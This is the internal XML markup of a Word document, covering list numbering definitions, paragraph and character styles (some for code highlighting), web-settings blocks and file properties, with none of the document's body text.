      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="440" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="880" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1320" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1760" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2200" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2640" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3080" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3520" w:hanging="440"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="489F2E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96826F7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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4DAF73AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F45C3662"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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529B422B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69CAFBB0"/>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5369253C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="357E8770"/>
    <w:lvl w:ilvl="0" w:tplc="91C238A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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5904410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5C241B31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C3C2484"/>
    <w:lvl w:ilvl="0" w:tplc="D7126BB8">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5F865C0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F45C3662"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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66EF324F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85E6567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6C7166AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="691266A0"/>
    <w:lvl w:ilvl="0" w:tplc="ADD67282">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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E2F411F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3D2F842"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="440" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingding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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7040061E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6503720"/>
    <w:lvl w:ilvl="0" w:tplc="CE5E7654">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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="717261D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BC220E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78FE79DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FB0B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883990"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91C0F7AE"/>
    <w:lvl w:ilvl="0" w:tplc="A770F3C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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7AFC5BC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C0EF086"/>
    <w:lvl w:ilvl="0" w:tplc="1302922C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cstheme="minorBidi" w:hint="eastAsia"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7EA95C8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="570C010E"/>
    <w:lvl w:ilvl="0" w:tplc="3F10C924">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="88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865554285">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="45568259">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1678070248">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1343899351">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1898662022">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1344939722">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="215507364">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="986395993">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="946236235">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="639119779">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="17781617">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1824008397">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="405154505">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="326982841">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="624897549">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2073380967">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="520558670">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2103140540">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="194393663">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="56976314">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="830413440">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="2104258811">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1458453935">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1789659398">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="789469051">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="106043997">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="325211653">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="726613213">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="17873825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5"/>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5EB"/>
    <w:rsid w:val="000129E1"/>
    <w:rsid w:val="00043158"/>
    <w:rsid w:val="000433CA"/>
    <w:rsid w:val="00045E7E"/>
    <w:rsid w:val="00047E59"/>
    <w:rsid w:val="000579C9"/>
    <w:rsid w:val="00061DD5"/>
    <w:rsid w:val="00092160"/>
    <w:rsid w:val="00095401"/>
    <w:rsid w:val="000C25F4"/>
    <w:rsid w:val="000E05EB"/>
    <w:rsid w:val="000E36D1"/>
    <w:rsid w:val="001A342A"/>
    <w:rsid w:val="001C4351"/>
    <w:rsid w:val="00233CC2"/>
    <w:rsid w:val="00256752"/>
    <w:rsid w:val="00297262"/>
    <w:rsid w:val="002C4926"/>
    <w:rsid w:val="002D4C60"/>
    <w:rsid w:val="002D525E"/>
    <w:rsid w:val="002E51A7"/>
    <w:rsid w:val="00360713"/>
    <w:rsid w:val="003921C8"/>
    <w:rsid w:val="003937BA"/>
    <w:rsid w:val="003D7491"/>
    <w:rsid w:val="003E6C84"/>
    <w:rsid w:val="00402341"/>
    <w:rsid w:val="00403C89"/>
    <w:rsid w:val="00414D10"/>
    <w:rsid w:val="00452BB1"/>
    <w:rsid w:val="004B462E"/>
    <w:rsid w:val="004B67A9"/>
    <w:rsid w:val="004E4569"/>
    <w:rsid w:val="004E5C0E"/>
    <w:rsid w:val="004F257C"/>
    <w:rsid w:val="00523441"/>
    <w:rsid w:val="00526A7B"/>
    <w:rsid w:val="00526CD9"/>
    <w:rsid w:val="005607C9"/>
    <w:rsid w:val="005A3AE7"/>
    <w:rsid w:val="005D7ADA"/>
    <w:rsid w:val="006110B0"/>
    <w:rsid w:val="00645941"/>
    <w:rsid w:val="00680D08"/>
    <w:rsid w:val="00687F88"/>
    <w:rsid w:val="006C0701"/>
    <w:rsid w:val="006F43D9"/>
    <w:rsid w:val="007049BB"/>
    <w:rsid w:val="00711544"/>
    <w:rsid w:val="00731A98"/>
    <w:rsid w:val="00754E56"/>
    <w:rsid w:val="007A4232"/>
    <w:rsid w:val="007D3C41"/>
    <w:rsid w:val="007D430A"/>
    <w:rsid w:val="007F700C"/>
    <w:rsid w:val="00800565"/>
    <w:rsid w:val="00824E01"/>
    <w:rsid w:val="00825828"/>
    <w:rsid w:val="00827D21"/>
    <w:rsid w:val="008A687B"/>
    <w:rsid w:val="008C16D9"/>
    <w:rsid w:val="008E0FF8"/>
    <w:rsid w:val="008E1091"/>
    <w:rsid w:val="009169D2"/>
    <w:rsid w:val="00946AE4"/>
    <w:rsid w:val="00971D61"/>
    <w:rsid w:val="009A21E9"/>
    <w:rsid w:val="00A73887"/>
    <w:rsid w:val="00AA33B8"/>
    <w:rsid w:val="00AB1028"/>
    <w:rsid w:val="00AD1836"/>
    <w:rsid w:val="00AF5F63"/>
    <w:rsid w:val="00B0438C"/>
    <w:rsid w:val="00B13B0C"/>
    <w:rsid w:val="00B202FB"/>
    <w:rsid w:val="00B34F32"/>
    <w:rsid w:val="00B53616"/>
    <w:rsid w:val="00B8392D"/>
    <w:rsid w:val="00BC0515"/>
    <w:rsid w:val="00C444E5"/>
    <w:rsid w:val="00C65353"/>
    <w:rsid w:val="00C8368D"/>
    <w:rsid w:val="00C95458"/>
    <w:rsid w:val="00CA1641"/>
    <w:rsid w:val="00CA6223"/>
    <w:rsid w:val="00D43374"/>
    <w:rsid w:val="00D46F86"/>
    <w:rsid w:val="00DB2B68"/>
    <w:rsid w:val="00DC2DF8"/>
    <w:rsid w:val="00E0502D"/>
    <w:rsid w:val="00E072A4"/>
    <w:rsid w:val="00E21DCF"/>
    <w:rsid w:val="00E62358"/>
    <w:rsid w:val="00E920EB"/>
    <w:rsid w:val="00EC2735"/>
    <w:rsid w:val="00ED4511"/>
    <w:rsid w:val="00EE78D3"/>
    <w:rsid w:val="00F20E2F"/>
    <w:rsid w:val="00F27977"/>
    <w:rsid w:val="00F53623"/>
    <w:rsid w:val="00F72DE8"/>
    <w:rsid w:val="00F82379"/>
    <w:rsid w:val="00F82A2E"/>
    <w:rsid w:val="00F86C7F"/>
    <w:rsid w:val="00FB45AB"/>
    <w:rsid w:val="00FE0B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B2AED7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7B6FB4C0-8884-4233-9F97-50B97A564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73887"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F86C7F"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>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A21E9"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="md-plain">
    <w:name w:val="md-plain"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009A21E9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00403C89"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00824E01"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00824E01"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000433CA"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A73887"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F86C7F"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part">
    <w:name w:val="part"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00F86C7F"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F86C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14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML1">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F86C7F"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F86C7F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F86C7F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F86C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913550">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="524057791">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="668563466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1175799836">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1285620904">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1312055555">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1550386174">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1755012970">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2144495336">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="242111097">
              <w:marLeft w:val="240"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1717969558">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1840121706">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="204197358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F06402-F2F4-4B29-B3E1-047F9D2D2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752</TotalTime>
  <Pages>13</Pages>
  <Words>1366</Words>
  <Characters>7792</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>64</Lines>
  <Paragraphs>18</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9140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Chenhao He</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>da at</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <cp:lastPrinted>2024-06-23T02:13:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-21T00:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-23T04:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>